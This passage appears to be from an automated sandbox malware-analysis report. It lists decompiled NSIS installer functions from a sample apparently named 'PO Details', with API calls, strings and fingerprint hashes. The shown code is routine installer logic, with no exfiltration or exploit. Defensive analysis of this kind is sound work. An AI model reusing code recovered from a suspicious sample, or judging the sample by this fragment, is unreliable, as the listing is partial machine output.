					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E00406358();
				}
				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c43
0x00401c45
0x00401c4c
0x00401c4f
0x00401c52
0x00401c5c
0x00401c60
0x00401c63
0x00401c6c
0x00401c6c
0x00401c6f
0x00401c73
0x00401c7c
0x00401c7c
0x00401c7f
0x00401c83
0x00401c85
0x00401cda
0x00401cdc
0x00401ce7
0x00401cf1
0x00401cf4
0x00401cf4
0x00401cfd
0x00000000
0x00401c87
0x00401c8e
0x00401c90
0x00401c93
0x00401c99
0x00401ca0
0x00401ca3
0x00401ccb
0x00401d03
0x00401d03
0x00401ca5
0x00401cb3
0x00401cbb
0x00401cbe
0x00401cbe
0x00401ca3
0x00401d06
0x00401d09
0x00401d0f
0x00402b08
0x00402b08
0x00402bc5
0x00402bd1

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: fbb483b0c38b2c52992a6a5b7edafa52747ff059505c006a33bc3772956b04e9
Instruction ID: 0f37489a7ff55aa34ce709233052591c61f0789b3923deb1f93634f017c8c928
Opcode Fuzzy Hash: fbb483b0c38b2c52992a6a5b7edafa52747ff059505c006a33bc3772956b04e9
Instruction Fuzzy Hash: E821AD7195420AAEEF05AFB4D94AAEE7BB0EF44304F10453EF601B61D1D7B84941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404C14 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404C14(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E0040644E(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E0040644E(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E0040644E(_t44, _t50, 0x42d268, 0x42d268, _a8);
				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
			}

0x00404c1d
0x00404c22
0x00404c2a
0x00404c2b
0x00404c38
0x00404c40
0x00404c41
0x00404c43
0x00404c45
0x00404c47
0x00404c4a
0x00404c4a
0x00404c51
0x00404c57
0x00404c57
0x00404c5e
0x00404c65
0x00404c68
0x00404c6b
0x00404c6b
0x00404c6f
0x00404c7f
0x00404c81
0x00404c84
0x00404c2d
0x00404c2d
0x00404c34
0x00404c34
0x00404c8c
0x00404c97
0x00404cad
0x00404cbe
0x00404cda

APIs

lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404CB5
wsprintfW.USER32 ref: 00404CBE
SetDlgItemTextW.USER32(?,0042D268), ref: 00404CD1

Strings

%u.%u%s%s, xrefs: 00404C9F

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: b76ac1a0420e4e0b333c5bf6ce8dc1ffaa1bbe794a9e104b7afa440aa402e0f9
Instruction ID: 33068f1a2098bbc59acf923d0b26dc9f7285eb9428391dcb76f0b5068863668e
Opcode Fuzzy Hash: b76ac1a0420e4e0b333c5bf6ce8dc1ffaa1bbe794a9e104b7afa440aa402e0f9
Instruction Fuzzy Hash: 6A11EB73A041283BEB00656D9D46E9E329C9B85334F264237FA25F31D1E978C82182EC

Uniqueness

Uniqueness Score: -1.00%

Function 00405DEE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405DEE(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406411(0x42fa70, _a4);
				_t21 = E00405D91(0x42fa70);
				if(_t21 != 0) {
					E004066C0(_t21);
					if(( *0x434f1c & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x42fa70 >> 1;
						while(1) {
							_t11 = lstrlenW(0x42fa70);
							_push(0x42fa70);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040676F();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405D32(0x42fa70);
								continue;
							} else {
								goto L1;
							}
						}
						E00405CE6();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405dfa
0x00405e05
0x00405e09
0x00405e10
0x00405e1c
0x00405e2c
0x00405e2e
0x00405e46
0x00405e47
0x00405e4e
0x00405e4f
0x00000000
0x00000000
0x00405e32
0x00405e39
0x00405e41
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e39
0x00405e51
0x00000000
0x00405e65
0x00405e1e
0x00405e24
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e24
0x00405e0b
0x00000000

APIs

Part of subcall function 00406411: lstrcpynW.KERNEL32(?,?,00000400,00403596,00433F00,NSIS Error,?,00000007,00000009,0000000B), ref: 0040641E

Part of subcall function 00405D91: CharNextW.USER32(?,?,0042FA70,?,00405E05,0042FA70,0042FA70, 4iv,?,C:\Users\user\AppData\Local\Temp\,00405B43,?,76693420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D9F
Part of subcall function 00405D91: CharNextW.USER32(00000000), ref: 00405DA4
Part of subcall function 00405D91: CharNextW.USER32(00000000), ref: 00405DBC

lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70, 4iv,?,C:\Users\user\AppData\Local\Temp\,00405B43,?,76693420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E47
GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 4iv,?,C:\Users\user\AppData\Local\Temp\,00405B43,?,76693420,C:\Users\user\AppData\Local\Temp\), ref: 00405E57

Strings

4iv, xrefs: 00405DF0
C:\Users\user\AppData\Local\Temp\, xrefs: 00405DEE

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 4iv$C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-4057652458
Opcode ID: d647ba489e44e4c384e8f234fc99267bc74e37b9af3ba258ec0477dc6db0c33a
Instruction ID: 87735b5e832f2f8e04389b482ed260ad6458a913df04a2d72dce2697f876d431
Opcode Fuzzy Hash: d647ba489e44e4c384e8f234fc99267bc74e37b9af3ba258ec0477dc6db0c33a
Instruction Fuzzy Hash: A5F0F435104D2216C63233369D09AAF1548CE82364759453BF8D1B22D1DB3C8B838CED

Uniqueness

Uniqueness Score: -1.00%

Function 00405CE6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405CE6(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405ce7
0x00405cf4
0x00405cf5
0x00405d00
0x00405d08
0x00405d08
0x00405d10

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034B2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00405CEC
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034B2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00405CF6
lstrcatW.KERNEL32(?,0040A014), ref: 00405D08

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405CE6

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
Instruction ID: e2e9208f063340fd7176cb3713d1db1a131c248cac7d4947b15e4777b480a213
Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
Instruction Fuzzy Hash: 4FD0A771101A306AC1117B84AC05DDF669CAE85300381403BF201B30A4C77C1D5187FD

Uniqueness

Uniqueness Score: -1.00%

Function 00402636 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00402636(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402D3E(0x11)) + _t16;
					} else {
						E00402D3E(0x21);
						E00406433("C:\Users\Arthur\AppData\Local\Temp\nsm89AB.tmp", "C:\Users\Arthur\AppData\Local\Temp\nsm89AB.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsm89AB.tmp\System.dll");
					}
				} else {
					E00402D1C(1);
					 *0x40adf0 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E00406371(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E00405FE8(_t31, _t31) >= 0) {
						_t14 = E00405FB9(_t31, "C:\Users\Arthur\AppData\Local\Temp\nsm89AB.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00402636
0x00402636
0x00402636
0x0040263b
0x0040263e
0x00402641
0x00402646
0x00402648
0x00402668
0x004026a2
0x0040266a
0x0040266c
0x00402680
0x0040268d
0x0040268d
0x0040264a
0x0040264c
0x00402651
0x0040265f
0x00402662
0x004026a7
0x004026aa
0x00402925
0x00402925
0x004026b0
0x004026b9
0x004026bb
0x004026da
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x004026bb
0x00402bc5
0x00402bd1

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll), ref: 0040268D

Strings

C:\Users\user\AppData\Local\Temp\nsm89AB.tmp, xrefs: 0040267B
C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll, xrefs: 00402651, 00402676, 00402688, 004026D4

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp$C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll
API String ID: 1659193697-2776283242
Opcode ID: cbf851dede0de5b856ead35177f4cf7f6014184e4ffab388a508884ee838afdb
Instruction ID: 2f8f56cab2ec293de193d712fca88bf9bcdcc229c68306483e13e7e6ef2e3e02
Opcode Fuzzy Hash: cbf851dede0de5b856ead35177f4cf7f6014184e4ffab388a508884ee838afdb
Instruction Fuzzy Hash: AD11E772A00205ABCB10AFB18F4AAAF77719F44748F25043FE402B71C1EAFD8891565E

Uniqueness

Uniqueness Score: -1.00%

Function 00402FB1 Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402FB1(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x42aa20; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x434f10;
						if(_t2 >  *0x434f10) {
							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F2B, 0);
							 *0x42aa20 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406842(0);
					}
				} else {
					_t6 =  *0x42aa20; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x42aa20 = 0;
					return _t6;
				}
			}

0x00402fb8
0x00402fd2
0x00402fd8
0x00402fe2
0x00402fe8
0x00402fee
0x00402fff
0x00403008
0x00000000
0x0040300d
0x00403014
0x00402fda
0x00402fe1
0x00402fe1
0x00402fba
0x00402fba
0x00402fc1
0x00402fc4
0x00402fc4
0x00402fca
0x00402fd1
0x00402fd1

APIs

DestroyWindow.USER32(00000000,00000000,0040318F,00000001,?,00000007,00000009,0000000B), ref: 00402FC4
GetTickCount.KERNEL32 ref: 00402FE2
CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: e942aba91c3d4d0b77748caef32317d1a3e8dc78421a0242562119172c6ce506
Instruction ID: d33bc14a5fcc1787285ca97da28f022d839d2e13e88132ee71d9f244d0d7cdfd
Opcode Fuzzy Hash: e942aba91c3d4d0b77748caef32317d1a3e8dc78421a0242562119172c6ce506
Instruction Fuzzy Hash: 4AF05E3160AA21ABC6216F10FF0DA8B7B64BB48B41741487AF842B15E9DB740CA1DB9D

Uniqueness

Uniqueness Score: -1.00%

Function 004053ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004053ED(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42d254 = _t16;
							E00404DA2();
						}
						L11:
						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404D22(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004043B3(0x413);
				return 0;
			}

0x004053f1
0x004053fb
0x00405417
0x00405439
0x0040543c
0x00405442
0x0040544c
0x0040544d
0x0040544f
0x00405455
0x00405455
0x0040545f
0x00000000
0x0040546d
0x00405424
0x0040545c
0x0040545c
0x00000000
0x0040545c
0x00405430
0x00405432
0x00000000
0x00405432
0x00405401
0x00000000
0x00000000
0x00405408
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 0040541C
CallWindowProcW.USER32(?,?,?,?), ref: 0040546D

Part of subcall function 004043B3: SendMessageW.USER32(0001038C,00000000,00000000,00000000), ref: 004043C5

Strings

, xrefs: 004053FD

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 26e100c8e936244900aacf90f380f9ed614629df6b7f9272593e4765ff02ca63
Instruction ID: 5278ea034fccd8c5818adddfb220a11f4cbf18c481ac084eeec191c980f5e464
Opcode Fuzzy Hash: 26e100c8e936244900aacf90f380f9ed614629df6b7f9272593e4765ff02ca63
Instruction Fuzzy Hash: F9012C71200609AFDF216F11DD80BDB3B66EB84756F504036FB01752E2C77A8C92DA6E

Uniqueness

Uniqueness Score: -1.00%

Function 004062DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004062DF(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E0040627E(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x004062ed
0x004062ef
0x00406307
0x0040630c
0x00406311
0x0040634f
0x0040634f
0x00406313
0x00406325
0x00406330
0x00406336
0x00406341
0x00000000
0x00000000
0x00406341
0x00406355

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,0040656E,80000002), ref: 00406325
RegCloseKey.ADVAPI32(?,?,0040656E,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll), ref: 00406330

Strings

Call, xrefs: 004062E6

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: d70c3446bea39a9e955728d1e3d97a4cd4df477861c945fcd5c6f0c2612e0d48
Instruction ID: 844154995e22508991f9c2085a3ddc533437a0a8a5a4e2329c4a16b7f523fd8f
Opcode Fuzzy Hash: d70c3446bea39a9e955728d1e3d97a4cd4df477861c945fcd5c6f0c2612e0d48
Instruction Fuzzy Hash: CF017172500209EBDF218F55CD05EDB3BA9EB54394F05803AFD5592150E738D964DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00403A4B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403A4B() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42b22c;
				_t3 = E00403A30(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42b22c =  *0x42b22c & 0x00000000;
				return _t3;
			}

0x00403a4c
0x00403a54
0x00403a5b
0x00403a5e
0x00403a5e
0x00403a60
0x00403a65
0x00403a6c
0x00403a72
0x00403a76
0x00403a77
0x00403a7f

APIs

FreeLibrary.KERNEL32(?,76693420,00000000,C:\Users\user\AppData\Local\Temp\,00403A23,00403839,00000007,?,00000007,00000009,0000000B), ref: 00403A65
GlobalFree.KERNEL32(?), ref: 00403A6C

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403A4B

Memory Dump Source

